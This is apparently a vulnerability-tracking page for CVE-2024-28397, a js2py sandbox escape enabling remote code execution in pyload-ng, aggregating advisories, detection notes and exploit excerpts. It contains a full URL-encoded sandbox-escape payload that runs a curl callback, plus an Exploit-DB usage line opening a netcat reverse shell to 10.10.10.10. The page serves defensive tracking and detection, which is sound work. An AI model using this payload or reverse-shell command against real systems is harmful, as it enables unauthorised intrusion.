CVE-2024-28397
published 2024-06-20CVE-2024-28397: An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
PriorityP342medium5.3CVSS 3.1
AVLACLPRLUINSUCLILAL
EXPLOIT
EPSS
4.55%
90.4th percentile
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pyload-ng_project | pyload-ng | 0 – 0.5.0b3.dev85 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandpackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A↗
sigma↗
id: CVE-2024-28397
info:
name: pyload-ng js2py - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: medium
http:
- raw:
- |-
POST /flash/addcrypted2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
package=pkg&crypted=MTIzNA%3D%3D&jk=...- →Exploit targets the /flash/addcrypted2 POST endpoint; detect POST requests to this path from non-localhost sources, especially with a manipulated Host header. ↗
- →A successful exploit response contains the string 'Could not decrypt key' with HTTP 500; use this as a confirmation matcher alongside DNS/OOB callback detection. ↗
- →Shodan/FOFA/Google queries can identify exposed pyload instances: search for http.html:"pyload", body="pyload", intitle:"pyload", or app="pyLoad". ↗
- →The exploit uses `nc -e /bin/bash` for reverse shell delivery; monitor for subprocess spawning from the pyload process with netcat or /bin/bash as child processes. ↗
- ·The /flash/addcrypted2 endpoint is intended to only accept localhost connections; the bypass relies entirely on Host header manipulation, so perimeter controls that trust the Host header will be ineffective. ↗
- ·No patch exists for js2py as of the time of writing; version 0.74 (released Nov 6, 2022) is the latest and remains vulnerable. ↗
- ·Calling js2py.disable_pyimport() does NOT fully sandbox the environment; attackers can still obtain a Python object reference and escape the sandbox via the class hierarchy traversal technique. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
ghsa5.3MEDIUM
osv5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
pyload-ng vulnerable to RCE with js2py sandbox escape
osv·2024-09-09·CVSS 5.3
CVE-2024-39205 [MEDIUM] pyload-ng vulnerable to RCE with js2py sandbox escape
pyload-ng vulnerable to RCE with js2py sandbox escape
### Summary
Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.
### Details
js2py has a vulnerability of sandbox escape assigned as [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), which is used by the `/flash/addcrypted2` API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.
### PoC
The PoC is provided as `poc.py` below, you can modify the shell command it execute:
```python
import socket
import base64
from urllib.parse import quote
ho
GHSA
pyload-ng vulnerable to RCE with js2py sandbox escape
ghsa·2024-09-09·CVSS 5.3
CVE-2024-39205 [MEDIUM] CWE-94 pyload-ng vulnerable to RCE with js2py sandbox escape
pyload-ng vulnerable to RCE with js2py sandbox escape
### Summary
Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.
### Details
js2py has a vulnerability of sandbox escape assigned as [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), which is used by the `/flash/addcrypted2` API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.
### PoC
The PoC is provided as `poc.py` below, you can modify the shell command it execute:
```python
import socket
import base64
from urllib.parse import quote
ho
GHSA
js2py allows remote code execution
ghsa·2024-06-20
CVE-2024-28397 [HIGH] CWE-94 js2py allows remote code execution
js2py allows remote code execution
An issue in the component `js2py.disable_pyimport()` of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
OSV
js2py allows remote code execution
osv·2024-06-20
CVE-2024-28397 [HIGH] js2py allows remote code execution
js2py allows remote code execution
An issue in the component `js2py.disable_pyimport()` of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
OSV
CVE-2024-28397: An issue in the component js2py
osv·2024-06-20·CVSS 5.3
CVE-2024-28397 [MEDIUM] CVE-2024-28397: An issue in the component js2py
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
No detection rules found.
Exploit-DB
Js2Py 0.74 - RCE
exploitdb·2026-04-30·CVSS 5.3
CVE-2024-28397 [MEDIUM] Js2Py 0.74 - RCE
Js2Py 0.74 - RCE
---
Exploit Title: Js2Py 0.74 - RCE
Date: 2026-02-03
Exploit Author: Ali Sünbül (xeloxa)
Author Page: https://github.com/xeloxa
Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py
Software Link: https://pypi.org/project/Js2Py/
Version: payload.js
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
"""
import argparse
import sys
def generate_payload(command: str) -> str:
"""
Generates the JavaScript payload to escape the sandbox and execute the command.
Args:
command (str): The system command to execute.
Returns:
str: The malicious JavaScript payload.
"""
# Escape double quotes to prevent syntax errors in the JS string
safe_command = command.replace('"', '\\"')
# The payload uses a recursive search to find subprocess.Popen starting from a leaked
# Python ob
Metasploit
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
metasploit·CVSS 5.3
CVE-2024-39205 [MEDIUM] Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74 is the latest version of js2py which was released Nov 6, 2022. CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source download manager designed to automate file downloads from various online sources. Pyload is vulnerable because it exposes the v
Nuclei
pyload-ng js2py - Remote Code Execution
nuclei·CVSS 5.3
CVE-2024-28397 [MEDIUM] pyload-ng js2py - Remote Code Execution
pyload-ng js2py - Remote Code Execution
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Template:
id: CVE-2024-28397
info:
name: pyload-ng js2py - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
impact: |
Attackers can execute arbitrary code on the server through malicious JavaScript code execution via js2py.
remediation: |
Update pyload-ng to a version that removes or secures the js2py dependency.
reference:
- https://github.com/advisories/GHSA-r9pp-r4xf-597r
- https://github.com/Marven11/CVE-2024-28397-js2py-Sand
2024-06-20
Published